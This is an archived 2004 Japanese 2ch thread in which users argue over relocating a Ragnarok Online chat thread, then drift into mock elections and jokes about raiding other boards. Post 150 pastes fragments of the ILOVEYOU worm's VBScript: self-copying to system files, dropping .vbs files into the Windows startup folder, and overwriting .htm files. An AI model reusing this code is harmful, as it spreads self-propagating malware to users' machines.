114 :ヽ(`Д´)ノ ウワァァァン:04/10/08 21:08:48 ID:2s1xEGHk
何気にラウンジ逝けって意見が多いからここは本気で動いてみないか
何すりゃいいのか分からんが('A`)

115 :ヽ(`Д´)ノ ウワァァァン:04/10/08 21:37:17 ID:l0yrI+Oe
言うだけで話進んだことないじゃまいか
いいと思ったんなら進めてみ

溶け込めてない奴が何言ってんだお^^みたいな印象もあるけどまあがんばれよ

116 :ヽ(`Д´)ノ ウワァァァン:04/10/08 21:56:59 ID:ui8zT6D5
俺は本ヌレが好きだ。だからこそ、意味もなくだらだらとRO本スレを名乗る本ヌレが嫌いだ。
これじゃ駄目か?('A`)

117 :ヽ(`Д´)ノ ウワァァァン:04/10/09 08:18:32 ID:mBT2yhwu
いい加減ROの話題がうざがられてるなんて信じるの止めろよ
必死な奴がID変えてもう延々と粘着してるだけなのに
電通に踊らされて韓流韓流とか言ってる奴と同レベルじゃねぇか

118 :ヽ(`Д´)ノ ウワァァァン:04/10/09 08:19:46 ID:HR22sDj6
>>116
俺もおまいとほぼ同じ考えだ。
「RO」と名乗る意味がないもの。ROの話をすると必ず
「ROの話は荒れるからタブーじゃなかったっけ?」
だの
「ROの話はお触り厳禁」
だの言う奴が出てくる('A`)
矛盾に満ち溢れたすばらしいスレだよまったく。
昔はこんなんじゃなかったのに。

119 :ヽ(`Д´)ノ ウワァァァン:04/10/09 08:48:47 ID:M+wWXKod
>117
そうやって粘着してる奴がいなくなったら、
とたんにRO嫌ってるのは一部の奴だけ〜言い出すのはなんて自作自演?

120 :ヽ(`Д´)ノ ウワァァァン:04/10/09 14:04:54 ID:cNDZ1guG
そもそもはROの話がうざいんじゃなくて
既出の質問が繰り返し出るのが鬱陶しかっただけなんだがな
鯖落ちたり鯖落ちたりして軽い祭り状態な空気ん時に
「アサシンのステ振りはどうしたらいいですか」とか聞かれるとかな

空気嫁ってこと

121 :ヽ(`Д´)ノ ウワァァァン:04/10/09 14:11:40 ID:flq/gWRU
ホンヌレが移動して
新しいRO本スレができても
結局はメインであるROの話で荒れまくって
込んだ話は患送りにされて雑談メインになるだけだろ

ホンヌレは雑談しながらROの話題をさりげなく出しつつ
ROの荒れそうな込み入った話題をにゅ患に誘導するところ

122 :ヽ(`Д´)ノ ウワァァァン:04/10/09 14:14:50 ID:6/+RdF6V
>>121
そ役割が全くできてないということにナゼ気づかない

123 :ヽ(`Д´)ノ ウワァァァン:04/10/09 14:56:52 ID:cNDZ1guG
盛り上がってるな

124 :ヽ(`Д´)ノ ウワァァァン:04/10/09 19:09:36 ID:v6QoKe/s
>>121
今の本ヌレを荒れてないと言う気か。
大規模MMO時代が酷すぎたというのもあるが、今の本ヌレもなかなか酷いもんだぞ('A`)
('A`)が使われ始めた初期ですら、一応ROの話題は続いていた。RO内本ヌレ集会なんてものもやってたはずだ。
今のケイオス花壇はしそ含む一部の馴れ合いで固定メンバー化、gdgdしてるだけ。
閉鎖的な本ヌレの象徴みたいな場所だなあれは。

こんな状況なら、いい加減俺たちはRO離れするべきだと思うんだ。
後継のRO本スレが機能するかはわからないし、最悪にゅ缶へのURLが貼られるだけになるかもしれない。
だが、ネ実2を適当な理由付けて占拠し続けてひろゆきに迷惑かけるよりマシだ('A`)
昔に比べればスレの勢いも鈍ってきたし、ラウンコかロビーで十分だと思うんだよな。

125 :ヽ(`Д´)ノ ウワァァァン:04/10/09 19:48:54 ID:Me06YQHs
実況2に本ヌレはいらない。
板違いのあのスレが何故今まで続いてきたのか疑問に思う。

126 :ヽ(`Д´)ノ ウワァァァン:04/10/09 19:52:26 ID:1pIHiHq9
>>124
確かにそうだな
テメェの言っているコトは十分正しい
だが正しいからとてそれが常に罷り通るとは限らねェ

127 :ヽ(`Д´)ノ ウワァァァン:04/10/09 21:36:27 ID:6dw6kOy1
>>126
だから罷り通るようにしようって話だろ('A`;;)

128 :ヽ(`Д´)ノ ウワァァァン:04/10/10 05:22:18 ID:LoiWF+Gm
罷り通さば輪廻のさだめ
己が足にて動かずんば汝の悪しきとする事是明日になりても悪しきままなり

そもそも管理守の命発せられたところで民が従うや否や是如何に
其が汝の命に依らば尚の事ぞ

129 :ヽ(`Д´)ノ ウワァァァン:04/10/10 11:33:48 ID:SOSjGGxm
んで、今回もやっぱりお流れってやつね。

130 :ヽ(`Д´)ノ ウワァァァン:04/10/10 13:15:35 ID:fCKBz1wJ
まぁここは簡潔に「ホンヌレは板違いなのか」で考えてみよう




……板違いな希ガス('A`)

131 :ヽ(`Д´)ノ ウワァァァン:04/10/10 19:56:37 ID:NITGXkGw
正直もういいじゃんって感じ

132 :ヽ(`Д´)ノ ウワァァァン:04/10/12 23:56:53 ID:ZGKcgJgI
ID変わる前だから言える


そういう事は本ヌレで言ってこいよ

133 :ヽ(`Д´)ノ ウワァァァン:04/10/13 03:31:23 ID:5vh12kfd
本当に本ヌレで言ってみたわけだな
お疲れ
あの主観でできたテンプレはいただけないが

134 :ヽ(`Д´)ノ ウワァァァン:04/10/13 09:23:54 ID:rB6GoyLf
もう手遅れな希ガス。
ちゃんとした本スレ立てても今の本ヌレ住民の一部が荒らすだろうし。
そもそもちゃんとした本スレ欲しい奴はにゅ缶に流れてるか。

135 :ヽ(`Д´)ノ ウワァァァン:04/10/16 07:28:23 ID:vloeZahC
自治スレつか愚痴スレだな
MMOBBSがあるのに何故2chにこだわるんだろうか

既出の質問やらステ振りの相談やらは、繰り返されりゃ
どこでも鬱陶しがられて当然
それをいつまでも根に持つ方が悪い

136 :ヽ(`Д´)ノ ウワァァァン:04/10/16 11:00:06 ID:OLYuG5UK
>>133
あれは荒らしだからな
>>135
本ヌレがRO本スレを名乗る理由があるかって言ってるんだ

137 :ヽ(`Д´)ノ ウワァァァン:04/10/16 11:04:43 ID:D7zBul1+
スレタイにROつけてないとネ実2に
いられなくなるから
ラウンジ辺りに移動でいいと思うけど
住人がめんどくさがるのでそこで終わり

138 :ヽ(`Д´)ノ ウワァァァン:04/10/16 17:48:30 ID:LTe7J4sO
DATTEヤッテランナイジャン(AAry

139 :ヽ(`Д´)ノ ウワァァァン:04/10/16 18:07:52 ID:v20BIupA
行きたきゃ勝手にラウンジでもどこでも行けよ
ただしここにある本ヌレには構うな

140 :ヽ(`Д´)ノ ウワァァァン:04/10/16 19:28:10 ID:9KrLQy6J
幼稚園児たちに議論しろってのがそもそも無理な話だ…ダメダコリャ。

141 :ヽ(`Д´)ノ ウワァァァン:04/10/16 21:31:27 ID:LKoyQWlJ
>>139みたいのが多いんだよなぁ
取り合えず運営側に言ってみるか

あとage

142 :ヽ(`Д´)ノ ウワァァァン:04/10/16 21:35:13 ID:7bRhfGeg
移動する訳は何よ?

143 :ヽ(`Д´)ノ ウワァァァン:04/10/16 21:46:24 ID:9KrLQy6J
>142
ネタじゃなくて本気で理解できないのか…?

144 :ヽ(`Д´)ノ ウワァァァン:04/10/16 21:53:07 ID:7bRhfGeg
ワカラン

145 :ヽ(`Д´)ノ ウワァァァン:04/10/16 22:22:46 ID:ajK+XiXA
空気嫁としか言い様がない
移動した後患者大量流入で相当楽しいことになりそうだけどな
楽しみにしてんだからがんばれよ

146 :ヽ(`Д´)ノ ウワァァァン:04/10/16 22:50:52 ID:vtVljpL/
愚痴スレ立てろ

147 :ヽ(`Д´)ノ ウワァァァン:04/10/16 23:31:13 ID:9FJ/+GOi
立てました移動してくださいって言ったところで聞くような連中じゃないしな漏れ等
何度かこんなスレが立ってるが結局何も変わらなかったのは大多数はここでいいと思ってる証拠だろ

148 :ヽ(`Д´)ノ ウワァァァン:04/10/16 23:38:09 ID:Vlxaso/r
>>147
これでいいっつうか動くのがマンドイただそれだけ
もし強制的に移動させられたらそれでいい

つまり
マンドイ

149 :ヽ(`Д´)ノ ウワァァァン:04/10/16 23:56:11 ID:4/ESH1au
ここは隔離板なんだから、今更解き放たれたところで迷惑ってもんですよ
例えスレタイが形骸化していたとしても、
それで移動するなり進退を決めるのは当の住人達であり
その住人の大多数が現状で満足してるんだからそれ以上どうしようもない
スレ内での啓蒙活動を諦めて半分スレから離れた少数の連中が、
気に入らん筋が通らんとここでウダウダ言ってても、
何も変わらないし、変えられないし、変わる必要も発生しない

気に入らんなら本ヌレ内で説得すればいい
それでスルーされるなら、通報大好きなRO厨らしく、運営にでも相談すればいい
運営が動けば嫌でも立ち退かざるを得んだろ
ま、自発的に移動を促すのは手遅れだろうな

150 :ヽ(`Д´)ノ ウワァァァン:04/10/17 00:17:34 ID:fsHJePiO
c.Copy(dirsystem&"\MSKernel32.vbs")

fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\LOVE- LETTER-FOR-YOU.TXT.vbs

fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"


151 :ヽ(`Д´)ノ ウワァァァン:04/10/17 01:10:37 ID:CCkDZLfa
>>149
すごい開き直りっぷりだな
自分達の悪行を自覚してる上で動かないのか

152 :ヽ(`Д´)ノ ウワァァァン:04/10/17 01:43:46 ID:Y4+sXAVj
現状うまく動いてんだからこのままでいいだろ('A`)
一応外部とにゅ患相互の緩衝材とかレファレンススレとして機能してるんだしさ

153 :ヽ(`Д´)ノ ウワァァァン:04/10/17 02:41:03 ID:uuX5dE/v
公園に住み着いた浮浪者の言い訳ってこんなもんなんだろうね

154 :ヽ(`Д´)ノ ウワァァァン:04/10/17 02:51:43 ID:Y4+sXAVj
>>153
浮浪者出さないような経営してくれないかな

155 :ヽ(`Д´)ノ ウワァァァン:04/10/17 11:18:53 ID:IldCOUht
まあおまいら俺たちのために議論してくれよ。
俺たちははその間適当に雑談してるからさ('A‘)

156 :ヽ(`Д´)ノ ウワァァァン:04/10/17 11:23:17 ID:JCmgO0K/
いまさらって感じがしないか?情報の纏まり具合はニュ姦なんかのほうがいいし、いまから整備して2chに集まんのかよ。
例え集まったとしてもニュ菅色に結局染まるんじゃねーの。住人の大半が両方に在籍してそうだし。
板リスト位だろ2chのメリット

157 :ヽ(`Д´)ノ ウワァァァン:04/10/17 16:52:54 ID:X8aAtjCV
この板の今後なんて知ったこっちゃない。
時々現れるRO厨がうざいからとっととRO名義を捨てたいだけだ('A`)

158 :ヽ(`Д´)ノ ウワァァァン:04/10/17 17:46:03 ID:Y4+sXAVj
>>157
じゃあRO名義捨てて一人でラウンジ行けば良いじゃない

159 :ヽ(`Д´)ノ ウワァァァン:04/10/17 19:54:40 ID:ha6c3Rt5
>>157
前から思ってんだが何様なんだと

160 :ヽ(`Д´)ノ ウワァァァン:04/10/17 23:37:33 ID:8SXhLwUS
しかしどうでもいいなあ
こんな板がどうなろうとどうでもいいじゃん

161 :ヽ(`Д´)ノ ウワァァァン:04/10/18 03:15:20 ID:QXEVrk8z
まあもし移動できるとすれば、第一候補は最悪板だろうな

162 :ヽ(`Д´)ノ ウワァァァン:04/10/18 11:33:05 ID:HpzUtLDi
>>161
すでにあるぞ

163 :ヽ(`Д´)ノ ウワァァァン:04/10/20 16:28:01 ID:Wtf0nsFr
あるのか

164 :a:04/10/20 17:57:36 ID:HXB7fKot
a

165 :ヽ(`Д´)ノ ウワァァァン:04/10/20 18:01:45 ID:DRinE9qh
>>163
†滅殺本ヌレ大富豪(汗 真☆闇影姫†
http://tmp4.2ch.net/test/read.cgi/tubo/1098180527/l50

通称 裏ヌレだ。
本ヌレでは言えない裏話や本ヌレの存在意義について議論(?)が交わされている。
まあ板移動を説得するならこっちの住人の方がまだ分かってくれるぞ('A`)

166 :ヽ(`Д´)ノ ウワァァァン:04/10/20 18:22:08 ID:bEaXCa2e
>165
初めて見たが、そっちの方がROの話をしてて本ヌレにふさわしくないか?

167 :ヽ(`Д´)ノ ウワァァァン:04/10/20 18:58:29 ID:MtT10cN1
どこが^^;

168 :ヽ(`Д´)ノ ウワァァァン:04/10/20 21:22:38 ID:SlukDw7F
IDないから自作自演も腹の弄り合いも容易だしな

169 :ヽ(`Д´)ノ ウワァァァン:04/10/21 04:28:30 ID:+BbQHvFz
RO以外のネトゲでここを占拠すれば
ホンヌレ含めてROスレを一掃できると思うんだけど、どうよ?

170 :ヽ(`Д´)ノ ウワァァァン:04/10/21 08:14:01 ID:rWoLzLk4
>>169
いや、それでもRO本ヌレは続くだろう。
リヴリースレとか立ってるけど、両者は全然干渉してないしな。
だが、色々なとこから色々な住人が入ってくれば、板自体の雰囲気が変わりそうだな。

171 :ヽ(`Д´)ノ ウワァァァン:04/10/21 12:54:15 ID:fOs2koD4
荒らして潰そう、みたいな感じだな

172 :ヽ(`Д´)ノ ウワァァァン:04/10/23 07:11:52 ID:+OP8Ws5B
ネトゲ1の方はそんな感じで潰されたけどな。

173 :ヽ(`Д´)ノ ウワァァァン:04/10/24 09:03:58 ID:8sv0J6Rh
自治新党は不滅です!


174 :ヽ(`Д´)ノ ウワァァァン:04/10/24 10:32:17 ID:i6QsgsB7
実質総合スレのみだからどこへでも移れるだろうけど
設定きつめにして今問題になってる実況1もまとめて隔離しちゃえば?


175 :ヽ(`Д´)ノ ウワァァァン:04/10/24 12:36:46 ID:uTyxE2Xp
つうかリヴリー追い出そうぜ!!
あいつら上げまくりで目障りだしな!!

176 :ヽ(`Д´)ノ ウワァァァン:04/10/24 14:29:11 ID:HjBhC9SZ
このスレはにゅ患以下ですね。
本ヌレを押し付けられる他板の気持ちとか考えてんの?
はっきり言って迷惑。
ここ自体がすでに隔離施設だから、ここに隔離しておけばいい。


177 :ヽ(`Д´)ノ ウワァァァン:04/10/24 15:39:48 ID:Xx08rVI2
>>176
ラウンジくらい覗いとけ。本ヌレ如きの勢いじゃちっぽけなもんだ。

178 :ヽ(`Д´)ノ ウワァァァン:04/10/24 17:18:13 ID:EvcTXiCD
>>176
2ちゃんねるへようこそ
もうちょっとあちこち見て回った方がいいぞ

179 :ヽ(`Д´)ノ ウワァァァン:04/10/25 10:02:28 ID:2zXgbolY
ネ実2はもともと隔離施設なんだからそのままでいいよ
ここはRO板だとかいって患臭いRO厨のスレで占拠されるだなんてマジ勘弁
それと、この板で何処のスレが上げまくりで目障りとか云ってる奴は
釣りとしか思えない

他C>>>>>>>他A>>超えられない壁>>>>>他B>>>>>>>次元の狭間>>>


                                                                  患臭いROスレ

180 :ヽ(`Д´)ノ ウワァァァン:04/10/25 15:51:01 ID:IBcGxuSz
不等号ってのは通常は一個、多くても二個しか使わないんだよ。
あと、超えられない壁だとか次元の狭間だとか、厨どころか消防クラスの発言だから控えようね^^;

181 :ヽ(`Д´)ノ ウワァァァン:04/10/25 20:14:53 ID:aIN1nlbZ
次元の狭間介しても両端の次元が同じなら無意味な罠

182 :ヽ(`Д´)ノ ウワァァァン:04/10/25 20:42:33 ID:3kBQ0pI7
ネトゲサロンにあったのをコピペ

>46 名前:名無しさん@ゴーゴーゴーゴー![sage] 投稿日:04/10/25 11:47:09 ID:nSQN8mqI
>ネトゲ系の自治やっている人に一つ本題とは関係ない忠告。
>自治スレのスレタイ、およびテンプレから、「自治新党」の文字は外した方がいいよ。
>「自治新党」と名乗っている連中は荒らしで、あちこちの板が被害を受けている。
>
>詳しくは
>【難民板】自治新党その1【新秩序】
>http://etc3.2ch.net/test/read.cgi/nanmin/1095207971/
>の頭の方を良く読んでみるといいよ。

183 :ヽ(`Д´)ノ ウワァァァン:04/10/25 21:32:06 ID:E9MGHixO
何かもうぼろぼろだな
何も分かってなかったわけだ

184 :ヽ(`Д´)ノ ウワァァァン:04/10/25 22:53:45 ID:zR0oARJ9
>>182
それの元ネタ

ネトゲスレ分割議論スレッド
http://ex5.2ch.net/test/read.cgi/net/1098591417/
晒しが世話になってるヲチ板な

185 :ヽ(`Д´)ノ ウワァァァン:04/10/26 08:03:15 ID:kUNqfZVX
結局のところ本ヌレがラウンコに移ればいいんだな

186 :ヽ(`Д´)ノ ウワァァァン:04/10/26 16:05:19 ID:X5nZvSzo
>>185
だからお前一人で行けよ

187 :ヽ(`Д´)ノ ウワァァァン:04/10/26 18:07:13 ID:kUNqfZVX
>>186
俺一人移動すれば何故問題が解決することになるのか?
真性引き篭もりの言うことは理解に苦しむな

188 :ヽ(`Д´)ノ ウワァァァン:04/10/26 18:15:58 ID:7BehF/OX
>>186で解決すると思う奴挙手



189 :ヽ(`Д´)ノ ウワァァァン:04/10/27 00:32:53 ID:Y86alpiQ
>>188


190 :ヽ(`Д´)ノ ウワァァァン:04/10/27 01:44:47 ID:jOI6te8v
ホンヌレ住民がラウンジに行くわけが無い
行くんだったらとっくにどっかに移ってる
ネ実2にホンヌレがあるのが気に喰わないRO厨は
にゅ患にでも行って下さい

191 :ヽ(`Д´)ノ ウワァァァン:04/10/27 15:15:42 ID:8iA76Xp6
ROの名義捨てろって言いたいだけなんだが。スレの名前もReal Onlineでよろ('A`)

192 :ヽ(`Д´)ノ ウワァァァン:04/10/27 15:25:52 ID:T5+PMaBF
じゃ、俺は諦めろと言いたいだけ

193 :ヽ(`Д´)ノ ウワァァァン:04/10/29 16:28:36 ID:BcF/jcKv
>>192
最初からそう言おうよ

194 :ヽ(`Д´)ノ ウワァァァン:04/11/01 16:30:40 ID:V+8C3TM8
秘技!クソスレage!!

195 :ヽ(`Д´)ノ ウワァァァン:04/11/05 22:20:12 ID:LYVIDql2
自治も大変ですね
                

196 :ヽ(`Д´)ノ ウワァァァン:04/11/07 13:03:56 ID:t7RWPazD
自治は大変でもないし
板も大変ではないよ

ネトゲサロンから刺客が来ただけ

197 :ヽ(`Д´)ノ ウワァァァン:04/11/07 16:03:07 ID:IAnYxDfs
じゃあこの板でネトゲサロンつぶそうぜ

198 :ヽ(`Д´)ノ ウワァァァン:04/11/09 10:05:48 ID:ZGHwnmU5
戦うべし!

199 :ヽ(`Д´)ノ ウワァァァン:04/11/09 18:37:18 ID:MVzz52sF
こんな辺境の自治する前に日本を自治してくれよ

200 :ヽ(`Д´)ノ ウワァァァン:04/11/10 03:18:47 ID:EvarwIlV
いきなり本命を攻めずに端から潰すのが戦争の定石というものだよ

201 :ヽ(`Д´)ノ ウワァァァン:04/11/10 08:19:41 ID:XwoF6D4H
>>199
日本の自治をするにはその半分を
その半分を自治するにはまた(中略)

このスレを自治すれば良いのさ

202 :ヽ(`Д´)ノ ウワァァァン:04/11/10 18:23:53 ID:MMEkNM1t
じゃあこのスレを自治するためにこの板の他のスレ全て削除しようぜ。

203 :ヽ(`Д´)ノ ウワァァァン:04/11/11 22:24:26 ID:Kan6Aag3
ネ実1が陥落寸前だからあそこを落としたら次はここだろうな。

204 :ヽ(`Д´)ノ ウワァァァン:04/11/12 18:42:36 ID:pi6bT6uH
じゃあその前にこの板でネ実1を陥落させようぜ。

205 :ヽ(`Д´)ノ ウワァァァン:04/11/12 22:56:19 ID:mgs9O0Jt
ネ実1を陥落させたらこっちに来るだろうが。

206 :ヽ(`Д´)ノ ウワァァァン:04/11/13 12:46:47 ID:c9zSrIzC
age

207 :ヽ(`Д´)ノ ウワァァァン:04/11/13 17:42:26 ID:18gj7hrV
じゃあそいつら全員ソーシャルハックして社会的に抹殺しようぜ。

208 :ヽ(`Д´)ノ ウワァァァン:04/11/14 20:55:37 ID:LRuwKEZ/
もっと平和的にいこうよ  

209 :ヽ(`Д´)ノ ウワァァァン:04/11/15 04:25:26 ID:Ao9BEvKd
ちょっと

210 :ヽ(`Д´)ノ ウワァァァン:04/11/15 04:25:33 ID:Ao9BEvKd
 

211 :ヽ(`Д´)ノ ウワァァァン:04/11/15 18:01:23 ID:FDyITvdn
じゃあそいつらと河原で殴り合って最後には仲直りしようぜ。

212 :ヽ(`Д´)ノ ウワァァァン:04/11/15 22:18:02 ID:5rUNIgDQ
 

213 :ヽ(`Д´)ノ ウワァァァン:04/11/18 05:29:18 ID:dx5Q+aLC
>>211
かっこいいなおい

214 :ヽ(`Д´)ノ ウワァァァン:04/11/21 08:50:03 ID:pq0LXAL0
そろそろ党首でも決めるか

215 :ヽ(`Д´)ノ ウワァァァン:04/11/21 09:22:27 ID:PK4CY/KP
自治なんていらん。迷惑なだけ。どうせ変わりゃしないよ

216 :ヽ(`Д´)ノ ウワァァァン:04/11/21 10:07:41 ID:W6swt9qY
( ゚д゚)ノリッコウホー

公約は利用者の自主性に任せる方向で。

217 :ヽ(`Д´)ノ ウワァァァン:04/11/22 08:19:18 ID:BReKques
>>216
採用。今後自治スレでコテ名乗るように。

218 :ヽ(`Д´)ノ ウワァァァン:04/11/23 00:40:42 ID:rN9N6skg
あほか

219 :ヽ(`Д´)ノ ウワァァァン:04/11/23 00:45:20 ID:cw1ZbAfL
党首に「あほか案」が提出されました

220 :ヽ(`Д´)ノ ウワァァァン:04/11/23 10:38:42 ID:eW9emB8+
この板には救世主が必要だ

221 :ヽ(`Д´)ノ ウワァァァン:04/11/23 11:53:25 ID:kBew5Q5M
[ ゚д゚]/リッコウホー

222 :ヽ(`Д´)ノ ウワァァァン:04/11/23 12:01:49 ID:g5FYbzRz
カエレ

223 :ヽ(`Д´)ノ ウワァァァン:04/11/24 10:36:21 ID:8uQp5Khc
>>219
次の案が出たので廃案になりました

「救世主が必要案」が提出されました

224 :ヽ(`Д´)ノ ウワァァァン:04/11/27 21:32:54 ID:hhfx9PLr
ひまな奴が党首になればいい

225 :ヽ(`Д´)ノ ウワァァァン:04/11/27 23:14:10 ID:4D2UqWeD
じゃあ時期党首はホームレス/学生/主婦か

226 :ヽ(`Д´)ノ ウワァァァン:04/11/27 23:28:44 ID:jwWIBnFp
20代前半の主婦が良いと思います

227 :ヽ(`Д´)ノ ウワァァァン:04/12/02 02:05:14 ID:Gr3udmMk
漏れは12歳くらいの主婦希望

228 :ヽ(`Д´)ノ ウワァァァン:04/12/03 00:35:03 ID:vDVX5SRe
ニートでいいじゃないか

229 :ヽ(`Д´)ノ ウワァァァン:04/12/04 09:30:14 ID:XKnvoo7D
28歳ぐらいの主婦がいいな
子供は作っちゃダメ

230 :ヽ(`Д´)ノ ウワァァァン:04/12/04 19:22:43 ID:iB9XhEmW
では選挙中なので法案の提出は不可という方向でよろしいか

231 :ヽ(`Д´)ノ ウワァァァン:04/12/06 02:57:40 ID:P6+ORE6V
よろしいよ

232 :ヽ(`Д´)ノ ウワァァァン:04/12/06 13:52:45 ID:KbJkXi45
保守age

233 :ヽ(`Д´)ノ ウワァァァン:04/12/12 01:08:42 ID:LgovkI3M
ネトゲ実況2より本ヌレを追放する!!!

234 :ヽ(`Д´)ノ ウワァァァン:04/12/12 06:20:55 ID:kY2Roqus
戦いだ!

235 :ヽ(`Д´)ノ ウワァァァン:04/12/12 07:16:28 ID:UGIsxwU6
本ヌレを追放するという事はここはリヴリー板になるわけですね

236 :ヽ(`Д´)ノ ウワァァァン:04/12/12 08:21:02 ID:+8I4dtEr
リヴリー、リヴリーってなんだ

237 :ヽ(`Д´)ノ ウワァァァン:04/12/12 15:40:07 ID:vZfyqYga
ラヴリーのことだ

238 :ヽ(`Д´)ノ ウワァァァン:04/12/12 20:54:08 ID:sp7SwWgV
[゚д゚]<←こいつのことさ

239 :ヽ(`Д´)ノ ウワァァァン:04/12/12 21:08:21 ID:XY2hGZRQ
wWw<本ヌレから来ました
( 'A`)<逆毛様ここネ実2ですよ

■Ragnarok Online EP4.0 Lv1871 WHF■
http://game7.2ch.net/test/read.cgi/ogame2/1102844073/

240 :ヽ(`Д´)ノ ウワァァァン:04/12/16 13:55:30 ID:pO5isNJs
>>239 落ちてるぜ

241 :ヽ(`Д´)ノ ウワァァァン:04/12/18 21:47:39 ID:ywE8/IJF
ごめんごめん

242 :ヽ(`Д´)ノ ウワァァァン:04/12/23 10:19:30 ID:zjw8pr5C
わおんわおん

243 :ヽ(`Д´)ノ ウワァァァン:04/12/24 18:12:27 ID:LYANQdiv
>242
かわいいーーー!
       かわいい!かわいい!
                かーわいいーーーー!

51 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)